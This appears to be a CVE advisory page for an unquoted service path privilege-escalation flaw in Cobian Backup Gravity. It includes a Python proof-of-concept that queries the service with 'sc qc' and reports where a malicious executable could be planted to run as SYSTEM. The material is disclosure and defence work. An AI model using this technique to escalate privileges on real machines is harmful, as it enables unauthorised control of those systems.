Security Vulnerability Report
CVE-2022-50688 (CVSS 8.4 HIGH)

Published: 2025-12-22 22:15:59
Last Modified: 2026-04-15 00:35:42

Description

Cobian Backup Gravity 11.2.0.582 contains an unquoted service path vulnerability that allows local users to potentially execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted service path in the CobianBackup11 service to inject malicious code that would execute with LocalSystem privileges during service startup.

CVSS Details

CVSS Score
8.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No CPE configuration data is available for this record. The affected product named in the description is Cobian Backup Gravity 11.2.0.582.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2022-50688 PoC - Cobian Backup Gravity Unquoted Service Path
# This PoC demonstrates the unquoted service path vulnerability in the CobianBackup11 service
import subprocess


def check_vulnerable_service():
    """Check if the CobianBackup11 service has an unquoted service path"""
    try:
        # Query the service configuration using the sc command
        result = subprocess.run(
            ['sc', 'qc', 'CobianBackup11'],
            capture_output=True,
            text=True
        )
        output = result.stdout

        # Check for BINARY_PATH_NAME in the output
        if 'BINARY_PATH_NAME' in output:
            print("[+] Found CobianBackup11 service")
            for line in output.split('\n'):
                if 'BINARY_PATH_NAME' in line:
                    path = line.split(':', 1)[1].strip()
                    print(f"[+] Service path: {path}")

                    # Check if the path is unquoted and contains spaces
                    if ' ' in path and not path.startswith('"'):
                        print("[!] VULNERABLE: Path is unquoted and contains spaces")
                        return True, path
                    else:
                        print("[-] Service path is properly quoted or has no spaces")
                        return False, path
        else:
            print("[-] CobianBackup11 service not found")
            return False, None
    except Exception as e:
        print(f"[-] Error checking service: {e}")
        return False, None


def exploit_unquoted_path():
    """
    Exploit the unquoted service path vulnerability
    Attack: Place a malicious executable in a path component before the actual executable
    """
    vulnerable, service_path = check_vulnerable_service()

    if not vulnerable:
        print("[-] Service is not vulnerable to unquoted path attack")
        return

    # Extract path components
    path_parts = service_path.replace('"', '').split('\\')

    # Find an exploitable path component (contains a space and comes before the .exe)
    for i, part in enumerate(path_parts):
        if ' ' in part and not part.endswith('.exe'):
            exploit_path = '\\'.join(path_parts[:i + 1]) + '.exe'
            print(f"[!] Potential exploit target: {exploit_path}")
            print(f"[!] An attacker could place malicious code at: {exploit_path}")
            print("[!] When the service restarts, this code will execute with SYSTEM privileges")
            break


if __name__ == '__main__':
    print("=" * 60)
    print("CVE-2022-50688 - Cobian Backup Gravity Unquoted Service Path")
    print("=" * 60)
    exploit_unquoted_path()
    print("\n[!] Note: This PoC is for educational purposes only.")

References

https://www.cobiansoft.com/
https://www.exploit-db.com/exploits/50791
https://www.vulncheck.com/advisories/cobian-backup-gravity-unquoted-service-path-privilege-escalation

Weakness: CWE-428 (Unquoted Search Path or Element)
